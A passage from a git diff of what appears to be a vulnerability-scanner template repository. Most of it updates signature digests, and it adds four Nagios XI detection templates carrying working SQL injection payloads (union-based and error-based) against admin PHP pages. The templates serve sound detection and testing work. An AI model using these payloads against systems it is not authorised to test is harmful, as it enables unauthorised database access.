@@ http: - type: status status: - 200 -# digest: 4a0a0047304502201172de1fadbd9844e9c68aa3d4c8ecf8f984fe0f3e1c597dd46126ec27e9258f02210084097dfb2da841127572d17e278e37481ccaf665576be1f82c40ffad6be71da4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e69bdcb3fa2b283c1b6182024ffdd266efd7457251b67234e56db326860d8c2b022100c6f67d7e4165debb3d19c617f22631630858768926f95b9f399c5a9980ab4302:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9288.yaml b/http/cves/2017/CVE-2017-9288.yaml index 80963a171b..29340b143b 100644 --- a/http/cves/2017/CVE-2017-9288.yaml +++ b/http/cves/2017/CVE-2017-9288.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220504f7b1ece1f1522c557a8067f748171b2bf275ecacadcc02bea0c64230f5666022055c79afeee112dafd031f00411f15a3a0f06d74ce1da2e16161347c03a2bcb6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207e796a36376ac4dc1f2447164c6e9ce1b8ca40ba4f326d0816e27af6de88175102202ef455533e5e08fd45a2bd5490179c9de1b95af158b25b736d393c4fdf352f5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9416.yaml b/http/cves/2017/CVE-2017-9416.yaml index d91aca11f0..f2bc24d415 100644 --- a/http/cves/2017/CVE-2017-9416.yaml +++ b/http/cves/2017/CVE-2017-9416.yaml @@ -51,4 +51,4 @@ http: - "contains(body, 'extensions')" - "status_code == 200" condition: and -# digest: 4b0a00483046022100fd42bff9839b68071a5bfb26255b686c81e1f145ad7abeb32af7d5a2ab889655022100ce8df5e0d83fe8c4b0bd0c40dac5d798948d9ff157bf88e4dc3e0f4a18154d40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100eeb180faf838b4927b92bf8517268ab8712df323d040cc7f15dbb2aa4ab9062e02202242d7b85aaddb683b6a9c5637ecaf2c10d6770fa42f98931746defb95e70d7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9805.yaml b/http/cves/2017/CVE-2017-9805.yaml index 56315ca789..8b453e5610 100644 --- a/http/cves/2017/CVE-2017-9805.yaml +++ b/http/cves/2017/CVE-2017-9805.yaml @@ -108,4 +108,4 @@ http: - type: status status: - 500 -# digest: 490a0046304402206516cae14c92562d40847af7cf2962d2b939ca350b26f6d8f2b15553966dfcb1022015c0fe613add268df436cd6e17b66cde24f32ae88c80ab68d56acf275e41b2b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cb91351ec67515ace05e6ae7fa2ef9aaf72ca5a3503905a1343c7863f1d51213022100be2621cc621f53362aac304bffe96e3afce17ebe4ba91d4c9a554e7bccc800e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9822.yaml b/http/cves/2017/CVE-2017-9822.yaml index 56556b8085..97e44144e5 100644 --- a/http/cves/2017/CVE-2017-9822.yaml +++ b/http/cves/2017/CVE-2017-9822.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 404 -# digest: 4a0a0047304502203c411c1d45da0eec88cf3bf58a5610b93778d61132fe244d1758c921799fcf8b022100c7a6885217fd7b1013720c32cf41e1b3300c4177273e5dc705bfaf018a675ce0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e5a6fd927cb393e452ead22d7d8b924abfdf94422c410f8418c378a65793b36102202d80e248af2287baf5e074b0fe40a19537693f901e83fe06d05104b7f4607a1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9833.yaml b/http/cves/2017/CVE-2017-9833.yaml index ddcdc345d9..fcdf436a30 100644 --- a/http/cves/2017/CVE-2017-9833.yaml +++ b/http/cves/2017/CVE-2017-9833.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204bda79531e556fb7cb44018f1d8c9a7c3a5711f68f68628037312b7a220abd4802204657bad710145ea81dabc27fcf1c7fc45d5ee089f769353e70ba5594d4cb1946:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c6c5530e8a0f7728fab4cc19d39ab606e55af708d754eddf2173d358e60e8520022056dcf2c7ef111692f117a4df198df23d7ffdb051dbf23191bd3d3c8f2e81eaed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9841.yaml b/http/cves/2017/CVE-2017-9841.yaml index 24b70ae27a..c521f6727c 100644 --- a/http/cves/2017/CVE-2017-9841.yaml +++ b/http/cves/2017/CVE-2017-9841.yaml @@ -76,4 +76,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207cad0f7dbc4a697b7174d641a1e9f121e4fac54c066645bfd193ad178c062d7902205fac59e141d8c034ce05f36546b69fa3b1ac7f9d0d5e345ef57d07219594144f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a8b27a306468aebf732343c961456cf2432fb5a516c6c85ff6c4c62f0c01316e022100f2d5e57852cf73ca6546ebd6ddfbbec82b18542a7a84767a25cc65335fe9213d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000129.yaml b/http/cves/2018/CVE-2018-1000129.yaml index e92e7fa79e..c7ad561227 100644 --- a/http/cves/2018/CVE-2018-1000129.yaml +++ b/http/cves/2018/CVE-2018-1000129.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d03f30f56f8093e621dd36c09807e7cb7831c685de7d1b35127f4f36e034d6ae0220732bb3c1cbb9bff2f1ecd43dd48f151d9118c6d68c5083b827d861adcfaed78d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ceae38b96d248c63737a82c437c72e4a369cf651d1c2371f95595a2622cc58d302210086e805d7edbfb0a898eacff9a76969da740278209f40b3ba6cba2e5d615cfa16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000226.yaml b/http/cves/2018/CVE-2018-1000226.yaml index 41c42d57b1..5eb5e5ebfa 100644 --- a/http/cves/2018/CVE-2018-1000226.yaml +++ b/http/cves/2018/CVE-2018-1000226.yaml @@ -69,4 +69,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c36b8c1ba02776d4f1571cdca202e62d7b82dd127cebe19023dff995365305f0022100ee34f5da8f6807dd04df42e198bc03ac6891aad439f251980103877268617bcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201a7c5859f426d96f45cd86e280a49186d9b9ea388944c9ac9aa3c03a68f61219022100faca8e8923400b4cdf7ce1d714dde9bf2ed095375ead8f2870d6385412ee7e4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000533.yaml b/http/cves/2018/CVE-2018-1000533.yaml index edd6f32478..d240447832 100644 --- a/http/cves/2018/CVE-2018-1000533.yaml +++ b/http/cves/2018/CVE-2018-1000533.yaml @@ -55,4 +55,4 @@ http: - '(.*?)' internal: true part: body -# digest: 4b0a00483046022100bf324882241a17222b08e1456e38110610b465da49cd33db8337c6e36d8030fa0221009a39a5b06199ff2d5df9359d9fd7d5823a7f4406e822f08c53bc5567a3229a27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205d2c71f20fa19a22bd2be637fb9f250481422ea2c7a2f6a04beeec5e09b179ff0221008da783bdf386a1fcc3b2a3eb7663a56d1e4486680f94795bd3a365ba2542a2c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000600.yaml b/http/cves/2018/CVE-2018-1000600.yaml index 008473d685..157837e256 100644 --- a/http/cves/2018/CVE-2018-1000600.yaml +++ b/http/cves/2018/CVE-2018-1000600.yaml @@ -41,4 +41,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a0047304502203b4af4078977793c0b3f79a08da8b45089d14b94a74f9a50e4b9ddc3f8024c07022100b6e026c274511261a4fbd14de4b619cd3a32141480cd493e11bf4e295b96de4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bf2a9e11b8abb8568b2c65c93dba5541878586fe70a82089f8ff698406d5aeeb022100f63677bc4a54325d391b65c47da7048d32719df27785066d2a3297d0dcd4d2b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000671.yaml b/http/cves/2018/CVE-2018-1000671.yaml index 43e64d9c44..009d5c0c00 100644 --- a/http/cves/2018/CVE-2018-1000671.yaml +++ b/http/cves/2018/CVE-2018-1000671.yaml @@ -41,4 +41,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a004730450221008f6914b9147bf05e3e36ae76c9ca9bc08a91e50218b5aa25b178a76a4b53931102201a56da57ae2ec7cec21f662f70ab47099ab340af56ff9bf2d0e8587dc72d5f57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204e16f5d026a87fbad38aac592766dd6e68435602edbec28fe2e6270fafc0d437022100b08c758a888bb461050d16dce5bf53016a9a5c643a58e4b347f17111f5cb0bf2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000856.yaml b/http/cves/2018/CVE-2018-1000856.yaml index b0861dee25..dcc69a343c 100644 --- a/http/cves/2018/CVE-2018-1000856.yaml +++ b/http/cves/2018/CVE-2018-1000856.yaml @@ -66,4 +66,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200c8fbe1dfd77064adf4f856cdfde5fea334178dabfb031ec1cb31540453c8dda02203d799115c3898d4be7c874f2729cc76cbcddbb3892ad8d5f89a3b860fe55e133:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205e60ba8ac7b7b68b9dcb58a31e4b4083007aa34e42c8dbc2d4750a2e0242c4ef022100b9eb8ca7486f72fde65b1b901b782329f828735d4b45ec7c80b345137845b021:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000861.yaml b/http/cves/2018/CVE-2018-1000861.yaml index d3dddae44e..cd9da547aa 100644 --- a/http/cves/2018/CVE-2018-1000861.yaml +++ b/http/cves/2018/CVE-2018-1000861.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ed7eb531bf82260b21ac76dd13c70c9f30793c255f3aeba6adefc3f2fb75c184022100bc402b6121bc0d5d0726708bc8561a067bddddcf9cb74db276fc5f93bf7eca92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a0e0d200c13ff780452945498a6718daad53e9ac916fec0ae1d8ec8279d22c87022026d4243303647e6e1fa58d9a299d869d55e93ab4c51fdffbfba18684c231c7f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10141.yaml b/http/cves/2018/CVE-2018-10141.yaml index ad474134a6..e170b2d02c 100644 --- a/http/cves/2018/CVE-2018-10141.yaml +++ b/http/cves/2018/CVE-2018-10141.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220507ffbfb76be5730a985c05105e1573ea10692076caecd9b07d4f35e8f7a889e022100b86bc6fa194d4eafaad61560a771f32fee62f36c99f9cc3cda50479528ee67f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022018f9350a51b781627e508e4ea73cb51e957d0a25e20e8c48fddab20c83c420de022100e3b19a249e90117477ab0f47433355e22b384c3b92322dd9200df419034324be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10735.yaml b/http/cves/2018/CVE-2018-10735.yaml new file mode 100644 index 0000000000..2d033c66f6 --- /dev/null +++ b/http/cves/2018/CVE-2018-10735.yaml @@ -0,0 +1,41 @@ +id: CVE-2018-10735 + +info: + name: NagiosXI <= 5.4.12 `commandline.php` SQL injection + author: DhiyaneshDk + severity: high + description: | + A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/commandline.php cname parameter. + reference: + - https://vulners.com/seebug/SSV:97266 + - https://github.com/chaitin/xray/blob/master/pocs/nagio-cve-2018-10735.yml + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2018-10735 + cwe-id: CWE-89 + epss-score: 0.00403 + epss-percentile: 0.7323 + cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: nagios + product: nagios_xi + fofa-query: app="Nagios-XI" + tags: cve,cve2018,nagios,sqli + +variables: + num: "{{rand_int(2000000000, 2100000000)}}" + +http: + - method: GET + path: + - "{{BaseURL}}/nagiosql/admin/commandline.php?cname=%27%20union%20select%20concat(md5({{num}}))%23" + + matchers: + - type: word + part: body + words: + - "{{md5(num)}}" +# digest: 490a00463044022035a7d92fb1c6bdc0292d17ac1a892eff48264d750e529eaa1738dc451e31382702204c7fd46d051494a76df2f08a648ed4cac0cadb12ea23ac096fa34020eb4e2fa1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10736.yaml b/http/cves/2018/CVE-2018-10736.yaml new file mode 100644 index 0000000000..ac3bcd34f2 --- /dev/null +++ b/http/cves/2018/CVE-2018-10736.yaml @@ -0,0 +1,42 @@ +id: CVE-2018-10736 + +info: + name: NagiosXI <= 5.4.12 - SQL injection + author: DhiyaneshDK + severity: high + description: | + A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/info.php key1 parameter. + reference: + - https://github.com/0ps/pocassistdb + - https://github.com/jweny/pocassistdb + - https://vulners.com/seebug/SSV:97266 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2018-10736 + cwe-id: CWE-89 + epss-score: 0.00403 + epss-percentile: 0.7323 + cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: nagios + product: nagios_xi + fofa-query: app="Nagios-XI" + tags: cve,cve2018,nagios,sqli + +variables: + num: "{{rand_int(2000000000, 2100000000)}}" + +http: + - method: GET + path: + - "{{BaseURL}}/nagiosql/admin/info.php?key1=%27%20union%20select%20concat(md5({{num}}))%23" + + matchers: + - type: word + part: body + words: + - "{{md5(num)}}" +# digest: 4b0a0048304602210096f6d47bc3a2fd2ff957df8bdb5367c2223cc113bd088a105e29d264e9bc7de102210090f4905b4787b7185c8c9495b3de6a65eb1aa90ca66a3e97e77904bdc1d13a09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10737.yaml b/http/cves/2018/CVE-2018-10737.yaml new file mode 100644 index 0000000000..816ec7a586 --- /dev/null +++ b/http/cves/2018/CVE-2018-10737.yaml @@ -0,0 +1,45 @@ +id: CVE-2018-10737 + +info: + name: NagiosXI <= 5.4.12 logbook.php SQL injection + author: DhiyaneshDK + severity: high + description: | + A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/logbook.php txtSearch parameter. + reference: + - https://vulners.com/seebug/SSV:97267 + - https://nvd.nist.gov/vuln/detail/CVE-2018-10737 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2018-10737 + cwe-id: CWE-89 + epss-score: 0.00403 + epss-percentile: 0.7323 + cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: nagios + product: nagios_xi + fofa-query: app="Nagios-XI" + tags: cve,cve2018,nagios,sqli + +variables: + num: "{{rand_int(2000000000, 2100000000)}}" + +http: + - raw: + - | + POST /nagiosql/admin/logbook.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + txtSearch=' and (select 1 from(select count(*),concat((select (select (select md5({{num}}))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)# + + matchers: + - type: word + part: body + words: + - "{{md5(num)}}" +# digest: 4b0a00483046022100f949d4089c1e58b578466210669aa11213a35c30675c334422db2a397452a130022100efde25a1cf6d6e04b0272e13b7dbedaa4967cdef95f25098659f2153a00df361:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10738.yaml b/http/cves/2018/CVE-2018-10738.yaml new file mode 100644 index 0000000000..9c37617a2b --- /dev/null +++ b/http/cves/2018/CVE-2018-10738.yaml @@ -0,0 +1,44 @@ +id: CVE-2018-10738 + +info: + name: NagiosXI <= 5.4.12 menuaccess.php - SQL injection + author: DhiyaneshDk + severity: high + description: | + A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/menuaccess.php chbKey1 parameter. + reference: + - https://qkl.seebug.org/vuldb/ssvid-97268 + - https://vuldb.com/de/?id.117807 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2018-10738 + cwe-id: CWE-89 + epss-score: 0.00403 + epss-percentile: 0.7323 + cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: nagios + product: nagios_xi + fofa-query: app="Nagios-XI" + tags: cve,cve2018,nagios,sqli + +variables: + num: "{{rand_int(2000000000, 2100000000)}}" + +http: + - method: POST + path: + - "{{BaseURL}}/nagiosql/admin/menuaccess.php" + headers: + Content-Type: application/x-www-form-urlencoded + body: "selSubMenu=1&subSave=1&chbKey1=-1%' and (select 1 from(select count(*),concat((select (select (select md5({{num}}))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#" + + matchers: + - type: word + part: body + words: + - "{{md5(num)}}" +# digest: 490a0046304402202285ef8eb065ed205938c23f3c003cc2d946d8ab8a6c8c1bd97862cebffd6db60220284522e629f3ac4055349fd664d75a2645f27c19f847da1cb7aa77df38fd73b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10822.yaml b/http/cves/2018/CVE-2018-10822.yaml index cd2cff50a4..56605140cd 100644 --- a/http/cves/2018/CVE-2018-10822.yaml +++ b/http/cves/2018/CVE-2018-10822.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fd9fd7d6de90a4b7ffeec405a7f58e985465b28eb4a58c4f06ffa1a31cd4b3e7022100fd92fdb943c55c6b93d07670b0964f5eeeb539785be7354da3002e7e2e6a5e92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022023b69fc16b591f910806097c3c53ecff4c83e36806905b7a865a36fa93bc766f02202fe13b9a6e52cc4f9a56f91c5fc5cdd90030c89d3a2015b6e4658c9d9ac4b1a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10956.yaml b/http/cves/2018/CVE-2018-10956.yaml index e614b9fdd3..a509b9736d 100644 --- a/http/cves/2018/CVE-2018-10956.yaml +++ b/http/cves/2018/CVE-2018-10956.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fe37600b8efdbaa4840deaa9f07f8c880732b55136c7adfd6075990e70153bb102200230d874bd7f370ba0972c432a861f40ad4a0a83cf8eb7854e0caf46df5c8068:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f4b3ba62ada360ed542a1dc3aeb23fe810a3516b33b87653ac8cc1e848028c5b0221009dcb0edfc90ad78d55ad83bcfc106071329ffdb8ca67a671481c79a10b2a61cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11227.yaml b/http/cves/2018/CVE-2018-11227.yaml index 5c94a94a5b..dd9501ca2f 100644 --- a/http/cves/2018/CVE-2018-11227.yaml +++ b/http/cves/2018/CVE-2018-11227.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100daefbc1c86b5ff7aa088fde9180ed046d7f37e53409c300a8e5fb343ce2806d4022005c695baced97dd824869c81e8e4350292de5bc08d55723eeedc17f9c7b02aba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022074cd3bf33b0ec1ad4b73a00fa8f4cfde3b82a43929ed109dd58ad53b67201676022076a0f365907066a7d10d38ff9db65c72da72a1cf7dfce6c3a44502c6ae55bdcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11231.yaml b/http/cves/2018/CVE-2018-11231.yaml index a54774291b..0245c2a8a3 100644 --- a/http/cves/2018/CVE-2018-11231.yaml +++ b/http/cves/2018/CVE-2018-11231.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009001f6527480e6c9901d859c1911c9d6b8c8c21a1f3af4da6657e54eca2f0cac0220021a805d482df67be8a8cdfb2053469616ea91b218d2cc5dc0dc9edb1c39fa6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210094fdc034027036f675331a436c8d9717e75ce79fc7a19d05b65af74381436044022100f81d99821fdfe5caea01c0c541569fd07dd78ac1522bbf7146f0a3b802ac09e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11473.yaml b/http/cves/2018/CVE-2018-11473.yaml index 0046780028..b812c09865 100644 --- a/http/cves/2018/CVE-2018-11473.yaml +++ b/http/cves/2018/CVE-2018-11473.yaml @@ -70,4 +70,4 @@ http: - 'id="csrf" name="csrf" value="(.*)">' internal: true part: body -# digest: 490a0046304402201e97e0a68d893194c8d566eda14fd940e6fbad93b7d3ea3cdf6e9d7a3a6ba21102207615efbf96e1af2a70766467de6a5f3a32e852c30dab3d9542d14cb5d4bb95c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220740d343390daffdaa2e4889d6c8f3c60262ea0f8dfefa267015b150d60eb9c46022072f2d72c1ca4e16ec3ce633cf0ad2ae4a154180871ea90d771a74a50410a9bfb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11709.yaml b/http/cves/2018/CVE-2018-11709.yaml index 9d4ecb51ab..5deb50899a 100644 --- a/http/cves/2018/CVE-2018-11709.yaml +++ b/http/cves/2018/CVE-2018-11709.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c0e97c1ea41c209ef04d29707d322f7b9b90b92cca23651fec6c97c3f632d48a022100c1a1b3c02128ce8527e66e8c45a1578f29fafe747072c7305f68bba1f1cfea1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022020b9433d2689cd1c916656c6593704d52cdc82d3cae348cb23bbd6b903fa6e4102210093789a3005ae04750511962961e6ce2b78f9e2bdb3cd2d6871867fa439c29424:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11759.yaml b/http/cves/2018/CVE-2018-11759.yaml index 76e66f7eed..4146114bce 100644 --- a/http/cves/2018/CVE-2018-11759.yaml +++ b/http/cves/2018/CVE-2018-11759.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cf3feae8196157f1e2c9d96c6b51b806d430b01a9e3b594e41d006289ff6d95f022100ecd9bc36f9634c2c7c0fcd3b8a313344009afb2c90ae1aa6134b952fe927bbb2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022041afb53374b858558cfa721e985551966ce7288cec93b493945ea139d7386f8402205f4e5b293d6960714f5f73b027b4e94ae9e1807296b861ed9b23392772a3be60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11776.yaml b/http/cves/2018/CVE-2018-11776.yaml index 37bb722daa..540b9f8c3d 100644 --- a/http/cves/2018/CVE-2018-11776.yaml +++ b/http/cves/2018/CVE-2018-11776.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cc0520f88d3216000b301bc42cfc1f926a8c332ba59ee416ec6e6368a6819d88022100cdfed0778487a5bf060caea7e699e9b7c25223a254c28d0bfb3d992e4ed064b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ab1c51e0504628fe004acf4adeb03221ca6e19060ece841c357bd983b6d698760221009d5e783a014ec2025efc6cb4589970bba73805b98312143cd27a9ac719bdee2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12031.yaml b/http/cves/2018/CVE-2018-12031.yaml index 746d432343..d054420772 100644 --- a/http/cves/2018/CVE-2018-12031.yaml +++ b/http/cves/2018/CVE-2018-12031.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022031d3959c337f85dcf724906a16b85c62673e2289e79b17cf03ad01c152b94716022034fab6721dd237f9381d4dfa5ac8a1e86f117b9746b2656ed1ee7af9d07e70f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ab34469cfcefff232919bd56d0ecb10087647817db9eba51fae678e7630e51e002202f79da64c606d1225444596f885702817709284e378c496818f3ee1144ce6188:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1207.yaml b/http/cves/2018/CVE-2018-1207.yaml index 4fd6798b54..4025c87f5b 100644 --- a/http/cves/2018/CVE-2018-1207.yaml +++ b/http/cves/2018/CVE-2018-1207.yaml @@ -42,4 +42,4 @@ http: part: response words: - "calling init: /lib/" -# digest: 490a004630440220178fb945b611bea3f0c37997b2cee45ad3efad3a780b740cfccb949b7c90a40102204fe31ae91db311d9d2283bc4e3ed7a357e92b40735f6696af3432a21f6467bfd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100aecfe41ed529d979eb0d5e85bcb47766d58e166f2a3001bdd425be15bae9f33302204dbc7bef9234de5be6f16d334ac21107b1381db5dd0d893a75aeaf8a596b5b77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12095.yaml b/http/cves/2018/CVE-2018-12095.yaml index f913f5030b..b7c1c2ad4d 100644 --- a/http/cves/2018/CVE-2018-12095.yaml +++ b/http/cves/2018/CVE-2018-12095.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202d65999fffabc8dd888b9bbb3881345438d50868004720dceaeae7bff67ac8410220471ed1748734b9fa2f22ad3448b1d37d12a5e367a5243ee43953df0b72894a85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206cbd123e860c5657ebdbbfa98574fb5663ab2209adc3b40b143af0bad366355e022100db1434e013133eadf65a81ddda4ff57c1d48bfdd5f490d4252d757ede09fd48d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12296.yaml b/http/cves/2018/CVE-2018-12296.yaml index bf0c101eaf..917c709de5 100644 --- a/http/cves/2018/CVE-2018-12296.yaml +++ b/http/cves/2018/CVE-2018-12296.yaml @@ -48,4 +48,4 @@ http: regex: - '"version": "([0-9.]+)"' part: body -# digest: 4a0a0047304502205c4a803384d6072389dfd9e85f0ed3fe4d8f7d7ef8d42e0ff043ddb9ee75172a022100d5fbabaaa05e77e1c3a24115a1e2c53ea702ff7711706e49c66baec4fe2e45b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022060c783658faf40b7f9a34361eed36da0f94e1675b8f33ff246b9f4aeb1fb5154022100c74444ed55f597dff4be9289ccea933ff13cd951323438b922cd89b639507c63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12675.yaml b/http/cves/2018/CVE-2018-12675.yaml index a4ec8df889..52e4353249 100644 --- a/http/cves/2018/CVE-2018-12675.yaml +++ b/http/cves/2018/CVE-2018-12675.yaml @@ -41,4 +41,4 @@ http: part: body words: - '' -# digest: 4a0a004730450221009a6bc6b85b6aee85e3ccbbc26876e323436fb91c4e1574372135fe8219404932022074d1f180172920dbe913c175756dc2856b95bef79e7b885f116c69d9a2989282:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fe1e9de738122538a2449b660acfbadd5b2f6e95f978b4fd052467bb4f222c1b022077728b007829328b0aa238c9635a5106d04c04ef695ec1557e91b4b5b46cb70f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1271.yaml b/http/cves/2018/CVE-2018-1271.yaml index dc1adffb97..0842786335 100644 --- a/http/cves/2018/CVE-2018-1271.yaml +++ b/http/cves/2018/CVE-2018-1271.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 